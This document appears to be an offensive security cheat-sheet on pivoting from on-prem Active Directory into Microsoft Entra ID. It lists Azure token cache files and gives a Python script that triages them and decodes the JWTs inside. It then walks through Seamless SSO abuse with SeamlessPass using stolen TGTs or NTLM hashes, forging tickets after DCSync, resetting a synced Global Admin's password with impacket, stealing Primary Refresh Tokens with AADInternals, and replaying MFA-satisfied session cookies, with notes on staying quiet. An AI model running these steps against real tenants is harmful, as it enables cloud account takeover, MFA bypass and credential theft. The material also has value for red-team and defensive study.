Pivoting to Entra

Azure Tokens

These files are written by the Azure CLI and the Az PowerShell module (not by the AzureAD module, which keeps no on-disk cache). Depending on the installed version, the cached access and refresh tokens are either DPAPI-protected or sitting in cleartext JSON, so check the first bytes of each file rather than trusting the name. Inspect the C:\Users\user1\.Azure folder (the Azure CLI's .azure is the same folder on Windows) for these files:

# Cleartext (JSON)
accessTokens.json      # Azure CLI before 2.30: access and refresh tokens per resource
azureProfile.json      # Azure CLI: signed-in accounts and subscriptions (no tokens, but tells you who is logged in)
AzureRmContext.json    # Az PowerShell: current context (tenant, subscription, account)
TokenCache.dat         # Az PowerShell token cache; DPAPI-protected on Windows in some versions, so check the header

# Encrypted with DPAPI
msal_token_cache.bin   # MSAL cache used by Azure CLI 2.30+ on Windows (on Linux/macOS look for a cleartext msal_token_cache.json instead)
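Before copying files off the host it helps to know which of them are DPAPI blobs (those need the owner's DPAPI master key, or a run under that user's context, before they are useful) and which cleartext files still hold tokens worth replaying. The Python below is an added example for this page, not code from the Azure CLI, Az PowerShell or any tool named here. It recognises a DPAPI blob by the fixed header CryptProtectData writes, scans any non-DPAPI file for JWTs and decodes their payloads (without signature verification) to report tenant, audience, user, scopes and expiry. The sample cache contents, user names and tenant ID are constructed; the file names are the ones listed above. The same decoder works on any Entra JWT, including the PRT token returned by Get-AADIntUserPRTToken further down, whose payload carries the refresh_token and is_primary claims.

```python
"""Triage Azure CLI / Az PowerShell token cache files: DPAPI blob or cleartext,
and which JWTs inside are still usable. Added example; samples are constructed."""
import base64
import json
import re
from datetime import datetime, timezone
from pathlib import Path
from typing import Dict, List, Optional

# Every DPAPI blob (CryptProtectData output) starts with dwVersion = 1 followed by the
# provider GUID {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its on-disk byte order.
DPAPI_MAGIC = bytes.fromhex("01000000D08C9DDF0115D1118C7A00C04FC297EB")

# Entra JWTs are base64url header.payload.signature; both JSON parts encode to "eyJ...".
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> Dict:
    """Decode the payload only. The signature is deliberately not verified:
    we want to know what the token is for, not to trust it."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def summarize_token(token: str, now: Optional[float] = None) -> Dict:
    """The claims that decide whether a cached token is worth replaying."""
    c = jwt_claims(token)
    now = datetime.now(timezone.utc).timestamp() if now is None else now
    exp = c.get("exp")
    return {
        "tenant": c.get("tid"),
        "audience": c.get("aud"),
        "user": c.get("upn") or c.get("unique_name") or c.get("oid"),
        "scopes": c.get("scp"),
        "expires": datetime.fromtimestamp(exp, timezone.utc).isoformat() if exp else None,
        "expired": exp is not None and now > exp,
    }


def classify(data: bytes) -> str:
    """'dpapi' for a CryptProtectData blob (decrypt with the owner's master key first),
    'json' for a cleartext cache, 'unknown' for anything else."""
    if data.startswith(DPAPI_MAGIC):
        return "dpapi"
    try:
        json.loads(data.decode("utf-8-sig"))
        return "json"
    except (UnicodeDecodeError, ValueError):
        return "unknown"


def triage_file(name: str, data: bytes, now: Optional[float] = None) -> Dict:
    kind = classify(data)
    tokens = [] if kind == "dpapi" else [summarize_token(m.decode(), now) for m in JWT_RE.findall(data)]
    return {"file": name, "kind": kind, "tokens": tokens}


def triage_dir(path: str) -> List[Dict]:
    """Run over a copied .Azure folder."""
    return [triage_file(p.name, p.read_bytes()) for p in sorted(Path(path).iterdir()) if p.is_file()]


def _fake_jwt(claims: Dict) -> str:
    """Constructed, unsigned token for the demo; real Entra tokens are RS256-signed."""
    def enc(d: Dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}.nosig"


# Constructed stand-ins for a legacy Azure CLI accessTokens.json and an MSAL .bin cache.
TENANT = "11111111-2222-3333-4444-555555555555"  # made-up tenant ID
SAMPLE_ACCESS_TOKENS = json.dumps([
    {"tokenType": "Bearer", "resource": "https://management.core.windows.net/", "userId": "user1@corp.com",
     "accessToken": _fake_jwt({"aud": "https://management.core.windows.net/", "tid": TENANT,
                               "upn": "user1@corp.com", "exp": 4102444800}),
     "refreshToken": "0.ARcA-constructed-refresh-token"},
    {"tokenType": "Bearer", "resource": "https://graph.microsoft.com/", "userId": "user1@corp.com",
     "accessToken": _fake_jwt({"aud": "https://graph.microsoft.com/", "tid": TENANT,
                               "upn": "user1@corp.com", "scp": "Directory.Read.All", "exp": 1600000000})},
]).encode()
SAMPLE_MSAL_BIN = DPAPI_MAGIC + bytes(32)


def demo(now: float = 1700000000) -> List[Dict]:
    """Triage the constructed samples at a fixed 'now' so the result is reproducible."""
    return [triage_file("accessTokens.json", SAMPLE_ACCESS_TOKENS, now),
            triage_file("msal_token_cache.bin", SAMPLE_MSAL_BIN, now)]


if __name__ == "__main__":
    import sys
    for r in (triage_dir(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        print(f"{r['file']}: {r['kind']}")
        for t in r["tokens"]:
            print(f"  {t['user']} -> {t['audience']} exp {t['expires']}{' (EXPIRED)' if t['expired'] else ''}")
```

Run it with the path of a copied .Azure folder, or with no argument to see the constructed samples. Expired access tokens are not useless: the refreshToken next to them in accessTokens.json is what actually mints new access tokens, so an "(EXPIRED)" entry still tells you which user and resource the cache was for.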

Seamless SSO

If the tenant has seamless SSO enabled, Entra trusts Kerberos tickets from the on-prem domain: a service ticket for the AZUREADSSOACC$ computer account (SPN HTTP/autologon.microsoftazuread-sso.com) is exchanged for Entra access tokens for the user named in that ticket. Any TGT you hold, or any NTLM hash or password you can request one with, therefore becomes cloud access for that synced user, and because the AZUREADSSOACC$ key is rarely rotated, dumping it via DCSync lets you forge that service ticket for any synced user. The resulting sign-in still lands in the Entra sign-in logs, but nothing changes on-prem and no MFA prompt is triggered, so this is an extremely useful (and quiet) path whenever you have domain credentials or DC access. SeamlessPass is a good tool for this; -dc is the domain controller it will talk to for tickets.

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF

Non-Seamless SSO

Unfortunately, many tenants are not configured with seamless SSO. That leaves two options for pivoting from on-prem AD (technically three if you can reach the Entra Connect server and dump the sync credentials: the on-prem MSOL_* account holds DCSync rights and its cloud counterpart sits in the Directory Synchronization Accounts role, and AADInternals can extract both from that server).

The first option is to change the password of a synced Global Admin, wait for password hash sync to push the new hash to Entra (the sync cycle runs about every two minutes), and then sign in with the new password. From there you can create a new highly privileged user or service principal, but either way it is going to be loud: the admin is locked out of their own account, and the password change, the sync and the new sign-in all end up in the logs. Before burning the account, confirm it is actually synced and not protected by MFA; cloud-only Global Admins are the documented best practice, so a suitable target may not exist.

changepasswd.py from impacket (its -reset mode, with -altuser/-altpass for the privileged account, sets a new password without knowing the old one)

The second option is to find an Entra-joined (or hybrid-joined) device where a Global Admin is signed in and obtain their PRT token from that session. This isn't as stealthy as it sounds either: the PRT is bound to the device and carries the MFA claim, so a PRT cookie replayed from your own host shows up in the sign-in logs as that device authenticating from an unexpected IP, which a decent SOC will notice. It still beats changing passwords, since nothing is modified and no prompt is shown to the user. Note that Get-AADIntUserPRTToken has to run inside the target user's logon session on the joined device: it asks the local BrowserCore/broker for the token rather than reading it out of LSASS.

ipmo "AADInternals-Endpoints"

# Get the PRT token for the current logon session (run as the target user on the joined device)
$prtToken = Get-AADIntUserPRTToken

# Exchange it for an access token and save it to the AADInternals cache so the other cmdlets can use it.
# AAD Graph is being retired; Get-AADIntAccessTokenForMSGraph takes the same -PRTToken parameter.
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken -SaveToCache

A final option is to reuse an existing browser session instead of authenticating at all. The ESTSAUTH and ESTSAUTHPERSISTENT cookies for login.microsoftonline.com represent a session that has already passed MFA, so replaying them in your own browser gets you in without a prompt; browser cookie stores are protected with DPAPI, so look for these cookies in DPAPI dumps. A known cleartext password is what keeps the session going when the portal asks for re-authentication.
